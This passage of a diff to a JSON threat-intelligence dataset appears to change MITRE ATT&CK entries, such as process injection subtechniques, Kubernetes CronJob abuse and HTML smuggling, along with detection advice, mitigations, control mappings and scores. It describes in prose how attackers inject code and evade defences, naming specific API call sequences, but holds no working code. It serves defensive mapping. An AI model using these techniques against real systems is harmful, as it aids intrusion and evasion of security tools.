-                "description": "Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.\n\nIn Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)",
-                "detection": "Monitor for the anomalous creation of scheduled jobs in container orchestration environments. Use logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments. ",
-                "mitigations": [
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
+                "tid": "T1027.006",
+                "name": "Obfuscated Files or Information: HTML Smuggling",
+                "url": "https://attack.mitre.org/techniques/T1027/006",
+                "description": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)\n\nAdversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as text/plain and/or text/html. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.\n\nFor example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as msSaveBlob.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)",
+                "detection": "Detection of HTML Smuggling is difficult as HTML5 and JavaScript attributes are used by legitimate services and applications. HTML Smuggling can be performed in many ways via JavaScript, developing rules for the different variants, with a combination of different encoding and/or encryption schemes, may be very challenging.(Citation: Outlflank HTML Smuggling 2018) Detecting specific JavaScript and/or HTML5 attribute strings such as Blob, msSaveOrOpenBlob, and/or download may be a good indicator of HTML Smuggling. These strings may also be used by legitimate services therefore it is possible to raise false positives.\n\nConsider monitoring files downloaded from the Internet, possibly by HTML Smuggling, for suspicious activities. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.",
+                "mitigations": []
             }
         ],
         "mitigations": [
             {
-                "mid": "M1047",
-                "name": "Audit",
-                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                "url": "https://attack.mitre.org/mitigations/M1047"
-            },
-            {
-                "mid": "M1028",
-                "name": "Operating System Configuration",
-                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                "url": "https://attack.mitre.org/mitigations/M1028"
-            },
-            {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
+                "mid": "M1049",
+                "name": "Antivirus/Antimalware",
+                "description": "Use signatures or heuristics to detect malicious software.",
+                "url": "https://attack.mitre.org/mitigations/M1049"
             },
             {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
             }
         ],
-        "cumulative_score": 2.1142857142857143,
-        "adjusted_score": 2.1142857142857143,
+        "cumulative_score": 1.4943144814285714,
+        "adjusted_score": 1.4943144814285714,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": true,
         "cis_controls": [
-            "4.1",
-            "4.7",
-            "4.8",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
-            "6.8",
-            "18.3",
-            "18.5"
+            "10.1",
+            "10.2",
+            "10.7",
+            "13.2",
+            "13.7"
         ],
         "nist_controls": [
-            "AC-2",
-            "AC-3",
-            "AC-5",
-            "AC-6",
-            "CA-8",
             "CM-2",
-            "CM-5",
             "CM-6",
-            "CM-7",
-            "CM-8",
-            "IA-2",
-            "IA-4",
-            "IA-8",
-            "RA-5",
-            "SI-4"
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-7"
         ],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
-        "cloud_coverage": true,
+        "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.5142857142857142,
-            "mitigation_score": 0.45454545454545453,
-            "detection_score": 0.58
+            "combined_score": 0.5714285714285714,
+            "mitigation_score": 0.2,
+            "detection_score": 0.98
         },
-        "choke_point_score": 0.6,
-        "prevalence_score": 1
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0.77288591
     },
     {
-        "tid": "T1055",
-        "name": "Process Injection",
-        "description": "Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \n\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. ",
-        "url": "https://attack.mitre.org/techniques/T1055",
+        "tid": "T1027.001",
+        "name": "Obfuscated Files or Information: Binary Padding",
+        "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) ",
+        "url": "https://attack.mitre.org/techniques/T1027/001",
         "tactics": [
-            "Defense Evasion",
-            "Privilege Escalation"
+            "Defense Evasion"
         ],
-        "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017) \n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nMonitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) \n\nMonitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
+        "detection": "Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool.  When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file. ",
         "platforms": [
             "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "File: File Metadata",
-            "File: File Modification",
-            "Module: Module Load",
-            "Process: OS API Execution",
-            "Process: Process Access",
-            "Process: Process Modification"
+            "File: File Metadata"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1055.001",
-                "name": "Process Injection: Dynamic-link Library Injection",
-                "url": "https://attack.mitre.org/techniques/T1055/001",
-                "description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.  \n\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ",
-                "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nMonitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    }
-                ]
-            },
-            {
-                "tid": "T1055.002",
-                "name": "Process Injection: Portable Executable Injection",
-                "url": "https://attack.mitre.org/techniques/T1055/002",
-                "description": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. ",
-                "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    }
-                ]
-            },
-            {
-                "tid": "T1055.003",
-                "name": "Process Injection: Thread Execution Hijacking",
-                "url": "https://attack.mitre.org/techniques/T1055/003",
-                "description": "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nThread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.  \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. ",
-                "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    }
-                ]
-            },
-            {
-                "tid": "T1055.004",
-                "name": "Process Injection: Asynchronous Procedure Call",
-                "url": "https://attack.mitre.org/techniques/T1055/004",
-                "description": "Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. \n\nAPC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point QueueUserAPC can be used to invoke a function (such as LoadLibrayA pointing to a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. ",
-                "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    }
-                ]
-            },
-            {
-                "tid": "T1055.005",
-                "name": "Process Injection: Thread Local Storage",
-                "url": "https://attack.mitre.org/techniques/T1055/005",
-                "description": "Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. \n\nTLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. ",
-                "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    }
-                ]
-            },
-            {
-                "tid": "T1055.008",
-                "name": "Process Injection: Ptrace System Calls",
-                "url": "https://attack.mitre.org/techniques/T1055/008",
-                "description": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. ",
-                "detection": "Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
-            },
-            {
-                "tid": "T1055.009",
-                "name": "Process Injection: Proc Memory",
-                "url": "https://attack.mitre.org/techniques/T1055/009",
-                "description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within /proc/[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ",
-                "detection": "File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    }
-                ]
-            },
+        "is_subtechnique": true,
+        "supertechnique": "T1027",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.1142857142857143,
+        "adjusted_score": 0.1142857142857143,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1027.002",
+        "name": "Obfuscated Files or Information: Software Packing",
+        "description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.  ",
+        "url": "https://attack.mitre.org/techniques/T1027/002",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.",
+        "platforms": [
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "File: File Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1027",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1055.011",
-                "name": "Process Injection: Extra Window Memory Injection",
-                "url": "https://attack.mitre.org/techniques/T1055/011",
-                "description": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. \n\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.\n\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process.  (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. ",
-                "detection": "Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Elastic Process Injection July 2017)",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    }
-                ]
-            },
-            {
-                "tid": "T1055.012",
-                "name": "Process Injection: Process Hollowing",
-                "url": "https://attack.mitre.org/techniques/T1055/012",
-                "description": "Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.  \n\nProcess hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection  before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. ",
-                "detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    }
-                ]
-            },
-            {
-                "tid": "T1055.013",
-                "name": "Process Injection: Process Doppelgänging",
-                "url": "https://attack.mitre.org/techniques/T1055/013",
-                "description": "Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. \n\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nAdversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nProcess Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):\n\n* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load – Create a shared section of memory and load the malicious executable.\n* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate – Create a process from the tainted section of memory and initiate execution.\n\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process. ",
